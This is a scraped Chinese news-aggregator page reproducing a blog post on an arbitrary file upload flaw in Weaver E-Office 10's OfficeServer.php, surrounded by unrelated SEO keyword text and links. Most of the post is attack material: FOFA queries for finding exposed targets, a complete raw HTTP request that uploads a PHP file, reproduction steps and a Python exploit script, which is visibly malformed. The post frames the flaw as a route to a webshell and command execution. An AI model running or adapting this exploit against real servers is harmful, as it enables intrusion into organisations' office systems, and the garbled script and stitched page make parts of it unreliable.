当前位置: 首页 > news >正文

昆明品牌网站建设腾讯云服务器学生优惠

news 2025/12/20 6:26:11
昆明品牌网站建设,腾讯云服务器学生优惠,如何建立网站会员系统吗,泰州企业建站程序声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件#xff0c;泛微 …声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞攻击者可以上传任意文件获取webshell在服务器上执行任意命令、读取敏感信息等 FOFA语法 bodyeoffice10 bodyeoffice_loading_tip Poc POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 395 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJjb5ZAJOOXO7fwjs Accept-Encoding: gzip, deflate Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFileData; filename1.jpg Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);? ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--漏洞复现 1、访问漏洞环境 2、老形式burp重放一下 出现下面的状态码和响应包说明漏洞可能存在 3、然后访问如下的URL链接,即可查看上传文件内容 http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php poc(python脚本 import re import requestsurlhttp://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php headers {User - Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0,Content - Length:393,Content - Type: multipart / form - data;,boundary ----WebKitFormBoundaryJjb5ZAJOOXO7fwjsAccept - Encoding: gzip, deflate,Connection:close }data {------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; nameFileData; filename1.jpg,Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);?------WebKitFormBoundaryJjb5ZAJOOXO7fwjs,Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php}------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- }response requests.post(url, headersheaders, datadata)print(Status Code:, response.status_code)if response.status_code 200:print(存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞) 修复建议 去官网打补丁
http://www.w-s-a.com/news/245324/

相关文章:

  • 腾讯云建设网站视频vi报价单
  • 个人网站发布怎么做建设银行网站收款怎么打明细
  • 网站整体色调网站建设都有什么类型
  • 比较简洁大方的网站软件工程四大方向
  • 大家称赞的网站建设常德小学报名网站
  • 做网站怎么建文件夹百度网盘搜索神器
  • 企业有域名怎么做网站淘宝推广平台
  • 学网站开发去哪学药品销售推广方案
  • 哔哩哔哩h5播放器深圳网站seo外包公司哪家好
  • asp做的手机网站wordpress 文章title
  • 网站验证码目录wordpress内嵌播放器
  • 文明网网站建设南昌市建设规费标准网站
  • 安康有建网站的公司吗做网站用什么网名好
  • 济南网站制作哪家专业西安市城乡建设网官方网站
  • 网站建设有趣小游戏怎样让网站优化的方式
  • 昭通做网站儿童编程教学入门教程
  • eclipse静态网站开发软文广告投放平台
  • 网站建设教学视频济南做网站需要多少钱
  • 网站免费做软件市工商联官方网站建设方案
  • 网站建设大体包含英铭长沙网站建设
  • 网站建设培训学校北京如何搜索网站
  • discuz论坛模板哪些网站容易做seo优化
  • 渭南公司做网站网站建设互联网推广
  • 公司网站app怎么做杭州建设局网站
  • 网站开发需要自己写代码吗12306网站多少钱做的
  • 策勒网站建设四川建设网有限责任公司招聘
  • 网站建设哪里有学网页界面设计论文
  • 怎么做外贸网站推广劳务公司网站怎么做
  • 滴答手表网站中铁建设集团有限公司招聘信息2021
  • 重庆富通科技有限公司网站新闻头条最新消息国家大事